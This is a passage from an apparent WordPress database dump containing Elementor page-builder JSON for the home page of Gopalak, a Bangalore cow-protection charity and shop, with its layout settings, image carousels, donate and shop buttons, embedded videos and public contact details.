-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11566,1921,'_elementor_page_assets','a:0:{}'),(11568,1922,'_elementor_edit_mode','builder'),(11569,1922,'_elementor_template_type','wp-page'),(11570,1922,'_elementor_version','3.7.8'),(11571,1922,'_wp_page_template','elementor_canvas'),(11572,1922,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 